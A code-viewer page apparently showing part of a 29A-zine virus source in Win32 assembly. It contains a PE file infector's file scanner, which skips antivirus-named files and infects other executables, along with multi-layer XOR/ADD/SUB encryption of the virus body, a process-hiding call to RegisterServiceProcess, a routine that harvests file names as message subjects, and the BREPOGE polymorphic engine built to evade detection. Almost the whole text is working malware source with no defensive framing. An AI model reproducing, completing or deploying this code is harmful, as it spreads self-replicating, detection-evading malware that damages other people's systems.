📄 29a-7.008
字号:
loop genPolyDataL
mov al,0c3h
stosb
mov ecx,[lCnt]
xor esi,esi
encryptLayers:
mov ebx,[kStack+esi]
mov edx,[mStack+esi]
push esi
push ecx
call encryptLayer
pop ecx
pop esi
add esi,4
loop encryptLayers
pop esi
sub edi,esi
mov ecx,edi
ret
encryptLayer:
mov esi,[poly]
add esi,5
mov eax,[vsize]
add eax,dropperSize
test ebx,1
jz _encryptLayer8
shr eax,1
mov ecx,eax
_encryptLayer16l:
or edx,edx
jz _encryptXOR16
cmp edx,_ADD
je _encryptADD16
add [esi],bx
jmp _encryptFNCOK16
_encryptADD16:
sub [esi],bx
jmp _encryptFNCOK16
_encryptXOR16:
xor [esi],bx
_encryptFNCOK16:
add esi,2
loop _encryptLayer16l
ret
_encryptLayer8:
mov ecx,eax
_encryptLayer8l:
or edx,edx
jz _encryptXOR8
cmp edx,_ADD
je _encryptADD8
add [esi],bl
jmp _encryptFNCOK8
_encryptADD8:
sub [esi],bl
jmp _encryptFNCOK8
_encryptXOR8:
xor [esi],bl
_encryptFNCOK8:
inc esi
loop _encryptLayer8l
ret
; - infectpe.inc EOF -
; - findfiles.inc BOF -
[extern FindFirstFileA]
[extern FindNextFileA]
[extern FindClose]
[extern SetCurrentDirectoryA]
[extern GetCurrentDirectoryA]
[extern MessageBoxA]
scandirpe:
push dword finddata
push dword fmask
call FindFirstFileA
inc eax
jz notFound
dec eax
mov dword [findHnd],eax
findNext:
mov eax,dword [nFileSizeLow]
cmp eax,2000h
jb skipThisFile
mov ecx,PADDING
xor edx,edx
div ecx
or edx,edx
jz skipThisFile
lea esi,[cFileName]
mov edi,esi
call isAV
jc skipThisFile
call infectpe
skipThisFile:
push dword finddata
push dword [findHnd]
call FindNextFileA
or eax,eax
jnz findNext
endScan:
push dword [findHnd]
call FindClose
notFound:
ret
scansubject:
push ebp
mov ebp,esp
sub esp,260
push ebp
sub ebp,260
cmp byte [pflag],1
jne near notFoundSubj
push ebp
push dword 260
call GetCurrentDirectoryA
or eax,eax
jz near notFoundSubjKO
push dword PersonalP
call SetCurrentDirectoryA
or eax,eax
jz near notFoundSubjKOBACK
push dword finddata
push dword fmaskall
call FindFirstFileA
inc eax
jz near notFoundSubjKOBACK
dec eax
mov dword [findHnd],eax
findNextSubj:
xor edx,edx
mov dword [ssubj],edx
lea esi,[cFileName]
lea edi,[gsubject]
storeSubjLoop:
lodsb
cmp al,'.'
jne notDot
xor eax,eax
notDot:
cmp al,'"'
je storeSubjLoop
stosb
inc edx
or al,al
jz subjOk
cmp edx,63
je subjOk
jmp storeSubjLoop
subjOk:
dec edx
mov dword [ssubj],edx
push dword 10h
call rnd
or eax,eax
jz endScanSubj
push dword finddata
push dword [findHnd]
call FindNextFileA
or eax,eax
jnz findNextSubj
endScanSubj:
push dword [findHnd]
call FindClose
push ebp
call SetCurrentDirectoryA
cmp dword [ssubj],4
jb notFoundSubjKO
notFoundSubj:
pop ebp
leave
ret
notFoundSubjKOBACK:
push ebp
call SetCurrentDirectoryA
notFoundSubjKO:
mov byte [pflag],0
pop ebp
leave
ret
; - findfiles.inc EOF -
; - process.inc BOF -
[extern LoadLibraryA]
[extern GetProcAddress]
stealthProc:
push dword kernel32dll
call LoadLibraryA
push dword registerSrvProc
push eax
call GetProcAddress
or eax,eax
jz notStealthProc
push dword 1
push dword 0
call eax
notStealthProc:
ret
; - process.inc EOF -
; - poly.inc BOF -
MAXPOLY equ 512
MAXLAYER equ 32 ; from 16 to 32 layers = max about 16kbs poly
_EAX equ 0
_ECX equ 1
_EDX equ 2
_EBX equ 3
_ESP equ 4
_EBP equ 5
_ESI equ 6
_EDI equ 7
_XOR equ 0
_ADD equ 1
_SUB equ 2
;
; BREPOGE
;
; it uses simple [XOR|ADD|SUB] as encryption function
; the keys used will be 16 or 8 bits
;
; junk is generated using the same schemes than algorithm code
;
; most basic don't support esp, so don't use esp
;
; check infectpe.inc to see 'how to multi-layer'
;
; brepoge usage:
;
; in: edi destination buffer
; esi idx init
; ecx size to encrypt
; out: ecx size of generated code
;
; required: extern DWORD rnd(DWORD top) -> return rnd number from 0 to top
;
; description of generation scheme:
;
; basic
;
; bmov r32,i32: lea r32,[i32]
; mov r32,i32
; push i32 / pop r32
;
; bmov r32,rb32: mov r32,rb32
; push rb32 / pop r32
;
; baddsub r32,i32: add r32,-i32
; sub r32,i32
; push r32
; pop r32
; push i32
; add r32,i32
; sub r32,i32
; xor [r32],i16/8
; add [r32],i16/8
; sub [r32],i16/8
; or r32,r32 (cmp r32,0)
;
; complex (recursive)
;
; cmov r32,rb32: bmov r32,rb32
; cmov rt32,rb32 / cmov r32,rt32
;
; cmov r32,i32: bmov r32,i32
; cmov r32,i32+mod / baddsub r32,mod
; cmov rt32,i32 / cmov r32,rt32
;
; TO DO
;
; + garbage generator
; + more recursive shit (calls, jmps, cmps)
; + add other encryption funcs (ror/rol)
; + add key slide to encryption algorithm
;
; Just coded to avoid naked viruses :)
;
brepoge:
push edi
mov [vIdx],esi
mov [vCnt],ecx
push edi
lea edi,[registers]
xor eax,eax
stosd
stosd
pop edi
mov byte [registers+_ESP],1
mov byte [freer],6
call junk
push dword 2
call rnd
mov [mKey],eax
call getFreeReg
mov [rIdx],eax
call getFreeReg
mov [rCnt],eax
push dword -1
call rnd
test eax,1
jz key8bits
push eax
push dword -1
call rnd
rol eax,8
pop edx
adc eax,edx
or eax,1
jmp dontclip
key8bits:
and eax,0feh
dontclip:
mov [vKey],eax
test eax,1
jz fullcounter
mov eax,[vCnt]
shr eax,1
mov [vCnt],eax
fullcounter:
push dword 2
call rnd
or eax,eax
jz callbk00
call bk01
call junk
call bk00
jmp endbk00s
callbk00:
call bk00
call junk
call bk01
endbk00s:
push edi
call junk
mov eax,[mKey]
or eax,eax
jz doXOR
cmp eax,_ADD
je doADD
mov eax,[rIdx]
mov edx,[vKey]
call _submri
jmp endFUNCTION
doADD:
mov eax,[rIdx]
mov edx,[vKey]
call _addmri
jmp endFUNCTION
doXOR:
mov eax,[rIdx]
mov edx,[vKey]
call _xormri
endFUNCTION:
push dword 2
call rnd
or eax,eax
jz callbk0
call bk1
call junk
call bk0
jmp endbks
callbk0:
call bk0
call junk
call bk1
endbks:
mov eax,[rCnt]
call _orrr
pop esi
sub esi,edi
sub esi,6
mov ax,850fh
stosw
mov eax,esi
stosd
call junk
pop ecx
sub edi,ecx
xchg ecx,edi
ret
bk00:
mov eax,[rIdx]
mov edx,[vIdx]
call cmovri
ret
bk01:
mov eax,[rCnt]
mov edx,[vCnt]
call cmovri
ret
bk0:
call getFreeReg
push eax
mov edx,[rIdx]
mov ah,dl
xchg ah,al
call cmovrr
mov eax,[esp]
xor edx,edx
dec edx
test dword [vKey],1
jz key8bitsb
dec edx
key8bitsb:
call baddsub
mov eax,[esp]
mov edx,[rIdx]
mov ah,dl
call cmovrr
pop eax
call freeReg
ret
bk1:
call getFreeReg
push eax
mov edx,[rCnt]
mov ah,dl
xchg ah,al
call cmovrr
mov eax,[esp]
xor edx,edx
inc edx
call baddsub
mov eax,[esp]
mov edx,[rCnt]
mov ah,dl
call cmovrr
pop eax
call freeReg
ret
junk:
push dword 4
call rnd
or eax,eax
jz junk1
mov ecx,eax
junk0:
push ecx
push dword -1
call rnd
mov edx,eax
call getFreeReg
push eax
call cmovri
pop eax
call freeReg
pop ecx
loop junk0
junk1:
ret
_xormri:
mov ah,1
test dh,0ffh
jz __xormri8
push eax
mov al,66h
stosb
pop eax
inc ah
__xormri8:
dec ah
cmp al,_EBP
jne __xormriNOEBP
mov al,75h
add ah,80h
xchg al,ah
stosw
mov al,00
stosb
jmp __xormri0
__xormriNOEBP:
add ah,80h
add al,30h
xchg al,ah
stosw
__xormri0:
test dh,0ffh
jz __xormri8b
mov ax,dx
stosw
ret
__xormri8b:
mov al,dl
stosb
ret
cmovrr:
push eax
push dword 2
call rnd
cmp al,0
jne _cmovrr0
pop eax
jmp bmovrr
_cmovrr0:
pop eax
cmp byte [freer],0
je bmovrr
push eax
call getFreeReg
push eax
mov dl,al
mov eax,[esp+4]
mov ah,dl
call cmovrr
pop eax
call freeReg
mov dl,al
pop eax
mov al,dl
jmp cmovrr
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -